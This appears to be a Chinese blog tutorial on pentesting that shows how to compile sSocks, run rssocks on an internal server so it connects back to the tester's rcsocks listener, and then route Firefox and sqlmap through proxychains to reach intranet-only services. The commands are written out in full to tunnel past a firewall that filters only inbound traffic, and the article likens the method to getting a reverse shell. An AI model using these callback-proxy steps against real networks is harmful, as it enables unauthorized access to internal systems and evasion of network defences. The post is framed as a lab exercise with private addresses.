有些服务为了安全都是直接放在内网进行访问,比如oa以及一些内网的访问服务等,那这个有没有什么突破方法呢?其实可以使用sSocks进行反向代理,突破内网限制!

sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,下载地址在http://sourceforge.net/projects/ssocks/这边进行下载,整个包的大小也不大,就三百多kb。

一般公网的防火墙只对从外边往里面连接的进行过滤,而对从内网往外边的不进行检查,比如公网对外开放的端口只有80端口和21,22等需要必须和外界通宵的端口外,其它的都不开放,那么这个时候从客户端访问服务器公网IP就只能从上面开放的那几个端口,但是服务器内网访问外网端口那就没有进行限制了!

下载解压后,执行命令编译。

 
./configure && make
下面进行做的这些测试渗透端的ip为:192.168.10.50

服务端的ip是:192.168.206.130

编译完成,进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:

程序 功能
nsocks 类似通过Socks5代理后的netcat,可用来测试socks server
ssocksd 用来开启Socks5代理服务
ssocks 本地启用Socks5服务,并反弹到另一IP地址
rcsocks 接收反弹过来的Socks5服务,并转向另一端口

1)本地监听端口
在渗透测试端192.168.10.50执行
./rcsocks -l 1088 -p 1080 -vv
等待远程Socks5服务器访问本地1080端口,创建端口1080与本地端口1088的连接通道

这个时候本地的端口就开启了1080的监听状态!等待别的计算机连接这个端口。

2)开启Socks5代理服务,反弹
在服务端192.168.206.130上执行
./rssocks -vv -s 192.168.10.50:1080
启用Socks5服务,去连接自己客户端的IP相对应监听的端口,这个时候客户端反弹到192.168.10.50的端口1080上,以后就可以通过这个代理端口连接到服务器那边网卡上面了。如果反射成功了,这个时候可以下载proxychains进行结合使用了

proxychains是一个代理客户端软件,可以支持几乎所有程序的代理,如ssh,telnet,ftp等。打开配置文件proxychains.conf(在BT5位于/etc/proxychains.conf),在[ProxyList]处添加
socks5 127.0.0.1 1088

配置成功后若要启动程序,仅需要在启动程序命令前加上proxychains。
1)启用浏览器firefox,在终端执行命令:
proxychains firefox
firefox启动成功,访问192.168.206.135的web服务,通过代理访问成功。

192.168.206.135是服务器端内部的搭建的一个服务器,只能通过内网进行访问,这个时候就突破了内网的限制。

2)利用sqlmap进行注入:
先切换到sqlmap目录
cd /pentest/database/sqlmap
proxychains python sqlmap.py -u “存在SQL注入的链接” –dbs

这个整体的思路和瑞士军刀差不多,可以通过反射获取shell,思路都是差不多的~

分享该文章:

相关文章:

  • 暂无相关文章